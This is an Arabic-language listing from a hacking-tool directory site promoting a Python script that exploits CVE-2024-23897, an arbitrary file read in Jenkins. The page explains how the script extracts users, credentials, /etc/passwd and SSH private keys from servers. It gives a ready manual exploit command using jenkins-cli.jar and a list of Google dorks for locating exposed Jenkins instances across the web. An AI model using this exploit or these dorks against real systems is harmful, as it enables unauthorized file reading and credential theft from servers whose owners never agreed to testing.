Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-23897-Arbitrary-file-read — سكربت مكتوب بلغة python لأتمتة الثغرة الأمنية CVE-2024-23897 | Kitploit
أدوات/GitHubGitHub/pulentoski/cve-2024-23897-arbitrary-file-read
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubpulentoski/cve-2024-23897-arbitrary-file-read

CVE-2024-23897-Arbitrary-file-read

سكربت مكتوب بلغة python لأتمتة الثغرة الأمنية CVE-2024-23897

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

🤵🏻 CVE-2024-23897 قراءة ملف اعتباطية 🤵🏻


الإصدارات المتأثرة:

  • Jenkins 2.441 والإصدارات السابقة له.
  • Jenkins LTS 2.426.2 والإصدارات السابقة له.

سكربت مكتوب بلغة بايثون لأتمتة استغلال الثغرة CVE-2024-23897 🤖 🛠️

يقدّم هذا الكود بلغة بايثون ماسحًا (سكانر) لثغرة محددة (CVE-2024-23897) في خوادم Jenkins. يبدأ بطلب عنوان URL لخادم Jenkins من المستخدم.

ثم يوفّر خيار تنزيل الملف "jenkins-cli.jar" اللازم للتفاعل مع Jenkins من سطر الأوامر. بعد ذلك، يعرض قائمة خيارات تتضمن تنفيذ أوامر مثل الحصول على معلومات عن الخادم، والبيئة، وإعدادات Jenkins، والمستخدمين، والاعتمادات (credentials)، بالإضافة إلى قراءة ملفات حساسة مثل "/etc/passwd" و"/etc/os-release" و"id_rsa".

بمجرد تحديد خيار من القائمة، يتم تنفيذ الأمر المقابل على خادم Jenkins المُقدَّم. الكود منظم بواسطة دوال لتنزيل الملف وتنفيذ الأوامر، ودالة رئيسية للتحكم في تدفق البرنامج.

التنفيذ لخادم Jenkins 📝:

root@kitploit:~
python3 CVE-2024-23897-A-scaner.py 

التنفيذ لخادم Jenkins داخل DOCKER 📝:

root@kitploit:~
python3  CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------

التنفيذ اليدوي.

1- تنزيل jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar

2- لإجراء LFI، نفّذ: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"


قائمة الدورك:

intitle:"Dashboard [Jenkins]" inurl:"/login"

intitle:"Jenkins" "Dashboard"

inurl:"/computer/" intitle:"Jenkins"

inurl:"/script" intitle:"Jenkins"

"Jenkins [Jenkins]" intitle:"Login"

intitle:"Jenkins" "Jenkins ver. 2.441"

inurl:"/manage" intitle:"Jenkins"

site:.com intitle:"Jenkins"

site:aws.amazon.com intitle:"Jenkins"

filetype:xml inurl:"jenkins/config.xml"

تنزيل الأداة